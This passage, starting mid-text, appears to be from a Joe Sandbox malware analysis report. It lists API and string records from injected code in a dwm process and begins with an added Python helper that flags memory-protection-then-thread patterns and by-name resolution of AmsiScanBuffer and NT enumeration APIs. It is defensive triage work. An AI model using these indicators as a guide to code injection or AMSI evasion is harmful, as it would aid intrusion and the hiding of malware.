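The two records above that matter most to an analyst are the one that calls VirtualProtectEx on its own process and then CreateThread (address 000002BAAF213631 onward), and the one that resolves AmsiScanBuffer and a set of NT enumeration routines by name through GetModuleHandleA/GetProcAddress. Reading several hundred of these bullet records by hand is slow, so the following added helper (example code, not Joe Sandbox's own and not part of this report) parses records in the report's bullet format and flags those two patterns. The SAMPLE_REPORT text is constructed from the two records above with the Opcode IDs truncated; the AMSI_APIS and ENUM_APIS tables are the analyst's own assumptions about which names are worth flagging, not fields of the report.

```python
"""Triage helper for Joe Sandbox function records (added example, not Joe Sandbox code).

Parses the bullet-style "APIs" / "Similarity" records and flags (a) a memory-permission
change followed by a thread start in the same function and (b) by-name resolution
(GetProcAddress) of AMSI or NT enumeration routines listed under "String ID".
"""
import re
from dataclasses import dataclass, field

# Constructed sample: two records condensed from the listing above, in the report's own
# format. The Opcode IDs are truncated here and hypothetical to that extent.
SAMPLE_REPORT = """\
APIs
• GetModuleFileNameW.KERNEL32 ref: 000002BAAF213631
• PathFindFileNameW.SHLWAPI ref: 000002BAAF213640
  • Part of subcall function 000002BAAF213BB8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002BAAF213657), ref: 000002BAAF213BF4
  • Part of subcall function 000002BAAF213BB8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000002BAAF213657), ref: 000002BAAF213C16
• CreateThread.KERNELBASE ref: 000002BAAF213687
Similarity
• API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
• String ID:
• Opcode ID: 78a450f75234da4d
APIs
• GetCurrentThread.KERNEL32 ref: 000002BAAF211D47
  • Part of subcall function 000002BAAF2120C0: GetModuleHandleA.KERNEL32(?,?,?,000002BAAF211D79), ref: 000002BAAF2120D8
  • Part of subcall function 000002BAAF2120C0: GetProcAddress.KERNEL32(?,?,?,000002BAAF211D79), ref: 000002BAAF2120E9
Strings
Similarity
• API ID: CurrentThread$AddressHandleModuleProc
• String ID: AmsiScanBuffer$NtQueryDirectoryFile$NtQuerySystemInformation$NtResumeThread$amsi.dll$ntdll.dll
• Opcode ID: 4705abceb593070c
"""

# Analyst assumptions (not report fields): names whose by-name resolution inside a host
# process deserves a second look. AMSI scan entry point; file/process/registry/service
# enumeration; thread resume; performance-counter readers.
AMSI_APIS = {"AmsiScanBuffer"}
ENUM_APIS = {
    "NtQuerySystemInformation", "NtQueryDirectoryFile", "NtQueryDirectoryFileEx",
    "NtEnumerateKey", "NtEnumerateValueKey", "EnumServicesStatusExW", "EnumServiceGroupW",
    "NtDeviceIoControlFile", "NtResumeThread",
    "PdhGetRawCounterArrayW", "PdhGetFormattedCounterArrayW",
}
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
                   "Similarity", "Control-flow Graph"}
# "Name.MODULE(" for subcall lines, "Name.MODULE ref:" for direct calls
CALL_RE = re.compile(r"([A-Za-z_]\w*)\.([A-Za-z0-9]+)(?:\(|\s+ref:)")
FIELD_RE = re.compile(r"^([A-Za-z ]+?):\s*(.*)$")


@dataclass
class FunctionRecord:
    apis: set = field(default_factory=set)       # {(api_name, MODULE)} direct calls and subcalls
    strings: list = field(default_factory=list)  # "String ID" entries, split on '$'
    fields: dict = field(default_factory=dict)   # remaining "Key: value" bullets

    @property
    def opcode_id(self) -> str:
        return self.fields.get("Opcode ID", "")


def parse_records(text: str) -> list:
    """Split text into records (each opens with an 'APIs' header) and parse each one."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None or line in SECTION_HEADERS:
            continue
        line = line.lstrip("• ").strip()
        if "ref:" in line:                       # API call line (direct or subcall)
            m = CALL_RE.search(line)
            if m:
                current.apis.add((m.group(1), m.group(2).upper()))
            continue
        m = FIELD_RE.match(line)
        if m:
            key, value = m.group(1), m.group(2)
            current.fields[key] = value
            if key == "String ID" and value:
                current.strings = value.split("$")
    return records


def triage(rec: FunctionRecord) -> list:
    """Return tags explaining why the record deserves attention; empty list if none fire."""
    names = {api for api, _ in rec.apis}
    strs = set(rec.strings)
    tags = []
    if names & {"VirtualProtect", "VirtualProtectEx"} and "CreateThread" in names:
        tags.append("protect-then-thread")
    if "GetProcAddress" in names and strs & (AMSI_APIS | ENUM_APIS):
        tags.append("dynamic-resolution-of-sensitive-apis")
    if strs & AMSI_APIS:
        tags.append("amsi-string")
    hits = sorted(strs & ENUM_APIS)
    if hits:
        tags.append("enumeration-api-strings:" + ",".join(hits))
    return tags


def triage_report(text: str) -> dict:
    """Map Opcode ID -> tags for every record that triggered at least one rule."""
    return {r.opcode_id: triage(r) for r in parse_records(text) if triage(r)}


if __name__ == "__main__":
    for opcode_id, tags in triage_report(SAMPLE_REPORT).items():
        print(opcode_id, tags)
```

Point the script at a text export of the full function listing rather than the constructed sample to sweep every record in the dump; the Opcode ID it reports is the key the report itself uses, so hits can be matched back to the listing and to the memory dump they came from.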

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: d31796d830b779bd35019739cbc6c4046c19c366aaa5f759b56b231691e58326
                                                        • Instruction ID: 4d986bfbe53463785bc2cce0d8d9cff0304497693efb45bc83489287b5bcd976
                                                        • Opcode Fuzzy Hash: d31796d830b779bd35019739cbc6c4046c19c366aaa5f759b56b231691e58326
                                                        • Instruction Fuzzy Hash: 3E513933200B8486EB28CF62E46C39AB7B5F788F98F048124DA4987768DF3DC459CB55
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000003.1817613500.000002BAAF1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAF1E0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_3_2baaf1e0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: bad array new length
                                                        • API String ID: 190073905-1242854226
                                                        • Opcode ID: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction ID: d78dc888d663f9f8e096334c887be32059b8155763ef9f3c124063d80c251090
                                                        • Opcode Fuzzy Hash: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction Fuzzy Hash: B081AF3361034186FA5CAB65D8493B97FF0AB55780F844127AB59C379ADB3BC842D732

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$CounterInfoProcess$AllocFree
                                                        • String ID: \GPU Engine(*)\Running Time
                                                        • API String ID: 1943346504-1805530042
                                                        • Opcode ID: 4320c3d255521c8809fbccc0c000ef70dc88065294953a5bba07585d713a8765
                                                        • Instruction ID: 827ca727855c6dfb9561eb47bc0c1bff2908194ac9db9ba34932d71fc10b52df
                                                        • Opcode Fuzzy Hash: 4320c3d255521c8809fbccc0c000ef70dc88065294953a5bba07585d713a8765
                                                        • Instruction Fuzzy Hash: 8331C133A00A4096EB38CF22A82C35AB3F1F798B85F444124DE4D83624DF39C91AC759

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$CounterInfoProcess$AllocFree
                                                        • String ID: \GPU Engine(*)\Utilization Percentage
                                                        • API String ID: 1943346504-3507739905
                                                        • Opcode ID: a2f2b6270209c0617fffbf8088b8af58c514d563d63196d61a77ac5b37470c57
                                                        • Instruction ID: 604fd7156905f951336c0376af5a9734d39e2e733c553a5a6a098d33176ff5bb
                                                        • Opcode Fuzzy Hash: a2f2b6270209c0617fffbf8088b8af58c514d563d63196d61a77ac5b37470c57
                                                        • Instruction Fuzzy Hash: 6131AD73610B4186FB28DF66A86C75A73B2F784F84F044125DE4A83724DF39C80AC719

                                                        Control-flow Graph

                                                        • Function start: 2baaf212c10 (rendered graph with executed/not-executed colouring not reproduced here)
                                                        • API calls on the graph: GetModuleHandleA, GetProcAddress, StrCmpNIW, lstrlenW
                                                        • Internal calls on the graph: 2baaf211934, 2baaf211bbc, 2baaf211bf4, 2baaf213c70, 2baaf2189d0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleModuleProclstrlen
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 3607816002-3850299575
                                                        • Opcode ID: 280e74d68912d67f2de1be9a053b4f09130ab35bfe7264d0fa8680fff1539601
                                                        • Instruction ID: 769e84a2c9f4a1d4c88bca80880055d21e2f1b8f387a042d7e45c9afeb02fba2
                                                        • Opcode Fuzzy Hash: 280e74d68912d67f2de1be9a053b4f09130ab35bfe7264d0fa8680fff1539601
                                                        • Instruction Fuzzy Hash: 79A1D037201A9082EF6C8F25D4283AA73B5F754B84F14402AEE4993BD8DF36DC49C369

                                                        Control-flow Graph

                                                        • Function start: 2baaf21104c (rendered graph with executed/not-executed colouring not reproduced here)
                                                        • API calls on the graph: RegQueryInfoKeyW, RegEnumValueW, GetProcessHeap, HeapAlloc, HeapFree
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: cdead5c203d895dcd3ca28035d3c1357740cab67237a15052ecca15c34582b89
                                                        • Instruction ID: 17b7c67a4659a1ee2ea207a4b9d2a1f744c0001ed1848a17b59a3d6ea6580b49
                                                        • Opcode Fuzzy Hash: cdead5c203d895dcd3ca28035d3c1357740cab67237a15052ecca15c34582b89
                                                        • Instruction Fuzzy Hash: 7A41A133210BC0C6EB64CF62E45839EB7B5F388B88F448129DA8947B58DF39C949CB15
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                        • String ID: \\.\pipe\Deadchildproc
                                                        • API String ID: 166002920-2259481039
                                                        • Opcode ID: 1005d7d54db17bd1b4de57f7c8175984e9a9ac4fa96f888e605f87ef2211e3c7
                                                        • Instruction ID: 5569d143b3704276fc45ae845523955183690dd4a9a822bfaed84a14c2286337
                                                        • Opcode Fuzzy Hash: 1005d7d54db17bd1b4de57f7c8175984e9a9ac4fa96f888e605f87ef2211e3c7
                                                        • Instruction Fuzzy Hash: C5115E32618B4083F7248B21F46875A7770F389BE4F544315EA5A46BA8CF3DC54DCB25
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction ID: caeccb32e2cdfb1f0617440fb68d376f8d3dfeb23e3626373eeddf6c39776d90
                                                        • Opcode Fuzzy Hash: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction Fuzzy Hash: E381BF3360424186FF6CAB2594B939A73B0A7C5BC0F544515AA09C7796DB3BCA4DC33E
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(?,?,?,000002BAAF219AEF,?,?,?,000002BAAF2198B4,?,?,?,?,000002BAAF2194A5), ref: 000002BAAF2199B5
                                                        • GetLastError.KERNEL32(?,?,?,000002BAAF219AEF,?,?,?,000002BAAF2198B4,?,?,?,?,000002BAAF2194A5), ref: 000002BAAF2199C3
                                                        • LoadLibraryExW.KERNEL32(?,?,?,000002BAAF219AEF,?,?,?,000002BAAF2198B4,?,?,?,?,000002BAAF2194A5), ref: 000002BAAF2199ED
                                                        • FreeLibrary.KERNEL32(?,?,?,000002BAAF219AEF,?,?,?,000002BAAF2198B4,?,?,?,?,000002BAAF2194A5), ref: 000002BAAF219A33
                                                        • GetProcAddress.KERNEL32(?,?,?,000002BAAF219AEF,?,?,?,000002BAAF2198B4,?,?,?,?,000002BAAF2194A5), ref: 000002BAAF219A3F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
                                                        • Instruction ID: a6bf6a94eddea89105b30db477d3daf9bee51736b7a005d7bcaf928fcac1f8de
                                                        • Opcode Fuzzy Hash: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
                                                        • Instruction Fuzzy Hash: E731C63335274091FE29DB02A82879973B8F748BA4F590625DD2D8B394DF39C54DC36A
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ef389f1408fdc57218b3d17a10d8552332256b0ab613155e2b85b84f861b2611
                                                        • Instruction ID: d0121da0eac36c6efb4a23c022dbfb35ac3b5afc2c8f350cd7495394a21f5874
                                                        • Opcode Fuzzy Hash: ef389f1408fdc57218b3d17a10d8552332256b0ab613155e2b85b84f861b2611
                                                        • Instruction Fuzzy Hash: 1F118C32314B8086E7649B52F868719B3B0F788FE4F544225EA5EC77A4CF7AC908C761
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: Dead
                                                        • API String ID: 756756679-1293411866
                                                        • Opcode ID: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
                                                        • Instruction ID: 9b4581ba7c1728fa510643aa63efff568e6099f6d452df6f50f91db6c1d52ff0
                                                        • Opcode Fuzzy Hash: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
                                                        • Instruction Fuzzy Hash: 4F31A033701B5182EA79AF56A86836977B1FB54B80F044020DF8883B54EF3ADCA9C719
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
                                                        • Instruction ID: 0bda700a449b738a7513a3e087965ece3026a7fc15e9c88ba9748331a614c350
                                                        • Opcode Fuzzy Hash: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
                                                        • Instruction Fuzzy Hash: 63016D32704A4082EB28DB12A46875973B5F788BC4F484134DE9D83754DF3EC949C769
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 30c8d17d90bd3745ebdb1f35502c968551356a20b63a74c7033b0010c96071d1
                                                        • Instruction ID: ca1db09284835703f8126d1d30cbbd0ee1ec14c941f4e324781277f7f715831b
                                                        • Opcode Fuzzy Hash: 30c8d17d90bd3745ebdb1f35502c968551356a20b63a74c7033b0010c96071d1
                                                        • Instruction Fuzzy Hash: B2111776201B4086FF389B61E82C71A73B5AB48B55F040824CA4D87764EF3ECA4CC72A
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
                                                        • Instruction ID: f4a654ae187bbc2741a9c03123a6bc6add0e6934cdeefba99666c279163a0754
                                                        • Opcode Fuzzy Hash: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
                                                        • Instruction Fuzzy Hash: ABF04F3330468192EB348B25F8A87597770F744B88F848121DA4986958DF7EDA8DCB25
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 0fefe4693416a643ad9e70920ffc3e33abc3de2cb316a83794251c8f9330dfe7
                                                        • Instruction ID: fa13591aeca66546914b0c1e565b36f44d29ebdfc84e8b75ef3c4e37e678ddf1
                                                        • Opcode Fuzzy Hash: 0fefe4693416a643ad9e70920ffc3e33abc3de2cb316a83794251c8f9330dfe7
                                                        • Instruction Fuzzy Hash: 32F08222304B8091EA288B13B9281197371AB48FD0F088131DE5A87B68CF3DCC89C719
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                         • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
                                                        • Instruction ID: a1c6838bf8565cfbc7161abdecf5326e6c79d494dbb047ffbf74450213791555
                                                        • Opcode Fuzzy Hash: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
                                                        • Instruction Fuzzy Hash: C8F08C63321A0082FF6C8F60E8AC3683370EB88B40F481419954BC6660CF3EC99CDB36
                                                        APIs
                                                        • _invalid_parameter_noinfo.LIBCMT ref: 000002BAAF2209C2
